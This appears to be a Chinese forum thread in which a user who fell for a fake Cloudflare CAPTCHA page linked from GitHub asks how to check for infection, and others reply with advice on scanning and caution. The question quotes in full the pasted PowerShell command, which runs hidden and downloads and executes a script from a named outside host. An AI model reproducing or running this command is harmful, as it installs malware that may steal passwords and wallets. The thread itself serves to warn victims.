有骗子在 GitHub 上传播诈骗链接,指向一个伪造的 Cloudflare 验证码网页,该网页指示我按⊞ Win+R键,Ctrl+V键,然后点击Enter。我按照指示操作,但什么也没发生。
我很快就意识到这是一个骗局。我怎么知道我的电脑是否感染了该骗局的病毒?
它指示我粘贴的一行诈骗代码如下。下面有位用户评论建议将代码分成两行,以防止有人误用。
powershell
-WindowStyle Hidden -Command ([ScriptBlock]::Create((irm https://jaihind.edu.in/weatherdolphin/dollrandom))).Invoke(); Write-Host " Cloudflare. inc. Captcha-ID:1488 ";```
要检测您的电脑是否已被感染,请安装并运行信誉良好的病毒扫描程序/恶意软件检测器。市面上有很多免费版本。
我在 Windows 上使用 MalwareBytes,在手机上使用卡巴斯基。
首先,如果网站要求你执行任何浏览器以外的操作,并且你不知道自己在做什么,就不要这么做。尤其是像 Cloudflare 这样信誉良好的反滥用公司,绝不会要求你运行任何类型的 CLI 命令。它只需要知道你的 IP 地址和浏览器指纹识别的各个部分,就能充分利用其功能。这太粗心了。
其次,该脚本尝试将一些代码加载到Windows应用程序域中。代码如下:
所以攻击者显然知道自己在做什么,而包含文件的网页仍然在线,并且仍然托管着这些文件。你肯定应该假设自己已经被感染了。
第三,如果你不完全了解它的功能,就无法检测到它。它甚至可能只是一种一次性病毒——例如,它会扫描你的文件以查找重要数据,例如密码/账户、电子邮件、加密钱包等等,然后在完成后自行删除——那么使用任何杀毒软件/反恶意软件进行扫描都是无用的。
否则,防病毒软件可能无法检测到它,它们只知道人们告诉它们知道的内容,启发式算法也无法检测到所有内容。
如果机器很重要,可能需要/建议联系安全专家。或者至少找个能告诉你脚本运行时机器到底发生了什么的人——这比用随机应用程序扫描要可靠得多。